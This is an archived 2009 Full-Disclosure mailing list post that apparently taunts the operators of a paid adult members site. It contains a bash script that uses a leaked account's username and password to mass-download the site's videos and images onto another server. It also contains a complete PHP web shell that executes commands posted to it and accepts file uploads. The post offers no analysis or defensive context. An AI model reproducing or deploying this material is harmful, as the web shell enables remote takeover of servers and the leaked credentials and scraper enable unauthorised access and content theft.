| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-Id: <E1LfRZH-000ABI-00.kristo57-mail-ru@f189.mail.ru>
Date: Fri, 06 Mar 2009 07:21:51 +0300
From: Kristo pher <kristo57@...l.ru>
To: full-disclosure@...ts.grok.org.uk
Cc: support@...reclub.com
Subject: prezzie from rx2s.org and lamers
http://rx2s.org/remote/test/XCORECLUB_RIP/
#!/bin/bash
export PATH=/usr/bin:/bin
for x in {1..28} ; do
LINKS=http\:\/\/members\.xcoreclub\.com/scenes\.php\?website\=all\&page\=$x
for VIDEOS in {1..4} ; do
NAME=$( wget -q -O - --http-user=joebar43 --http-password=nacichal43 "http://members.xcoreclub.com/scenes.php?website=all&page=$LINKS" \
| egrep -o 'class="model-name">[^<]+' | cut -d\> -f2 | head -n$VIDEOS | tail -1 )
DATUM=$( wget -q -O - --http-user=joebar43 --http-password=nacichal43 "http://members.xcoreclub.com/scenes.php?website=all&page=$LINKS" \
| egrep -o 'class="model-desc" align="right"><b>[^<]+' | cut -d\> -f3 | head -n$VIDEOS | cut -d" " -f3 | tail -1 )
LINK=$( wget -q -O - --http-user=joebar43 --http-password=nacichal43 "http://members.xcoreclub.com/scenes.php?website=all&page=$LINKS" \
| egrep -o 'href="sets/[0-9]+/video.html"' | cut -d\" -f2 | cut -d\" -f1 | head -n$VIDEOS | tail -1 )
VIDEO=$( wget -q -O - --http-user=joebar43 --http-password=nacichal43 "http://members.xcoreclub.com/$LINK" | \
egrep -o 'href="/content/[0-9]+/v002.wmv' | cut -d\" -f2 )
PIC=$( wget -q -O - --http-user=joebar43 --http-password=nacichal43 "http://members.xcoreclub.com/$LINK" | \
egrep -o 'src="/content/[0-9]+/pv000.jpg' | cut -d\" -f2 )
echo $NAME\_$DATUM $LINK $VIDEO $PIC
wget -O /mounted-storage/home101c/sub005/sc62783-TAAJ/www/remote/test/XCORECLUB_RIP/$NAME\_$DATUM\.jpg --http-user=joebar43 --http-password=nacichal43 "http://members.xcoreclub.com/$PIC"
wget -O /mounted-storage/home101c/sub005/sc62783-TAAJ/www/remote/test/XCORECLUB_RIP/$NAME\_$DATUM\.wmv --http-user=joebar43 --http-password=nacichal43 "http://members.xcoreclub.com/$VIDEO"
done
done
-----AND
<?
if($_POST['dir'] == "") {
$curdir = `pwd`;
//pwd
} else {
$curdir = $_POST['dir'];
}
if($_POST['king'] == "") {
$curcmd = "ls -lah";
} else {
$curcmd = $_POST['king'];
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Lamerz</title>
<style type="text/css">
body {
color: white; background-color: black;
font-size: 12px;
font-family: Helvetica,Arial,Sans-Serif;
}
</style>
</head>
<body>
$ob = @ini_get("open_basedir");
$df = @ini_get("disable_functions");
if( ini_get('safe_mode') ) {
echo "SM: 1 \\ ";
} else {
echo "SM: 0 \\ ";
}
if(''==$df) {
echo "DF: 0 \\ ";
} else {
echo "DF: ".$df." \\ ";
}
echo "".php_uname()."\n";
?>
<hr></pre>
<table><form method="post" enctype="multipart/form-data">
<tr><td><b>Execute command:</b></td><td><input name="king" type="text" size="100" value="<? echo $curcmd; ?>"></td>
<tr><td><b>Change directory:</b></td><td><input name="dir" type="text" size="100" value="<? echo $curdir; ?>"></td>
<td><input name="exe" type="submit" value="Execute"></td></tr>
<tr><td><b>Upload file:</b></td><td><input name="fila" type="file" size="90"></td>
<td><input name="upl" type="submit" value="Upload"></td></tr>
</form></table>
<pre><hr>
<?
if(($_POST['upl']) == "Upload" ) {
if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['fila']['name'])) {
echo "The file has been uploaded<br><br>";
} else {
echo "There was an error uploading the file, please try again!";
}
}
if(($_POST['exe']) == "Execute") {
$curcmd = "cd ".$curdir.";".$curcmd;
$f=popen($curcmd,"r");
while (!feof($f)) {
$buffer = fgets($f, 4096);
$string .= $buffer;
}
pclose($f);
echo htmlspecialchars($string);
}
?>
</pre>
</body>
</html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists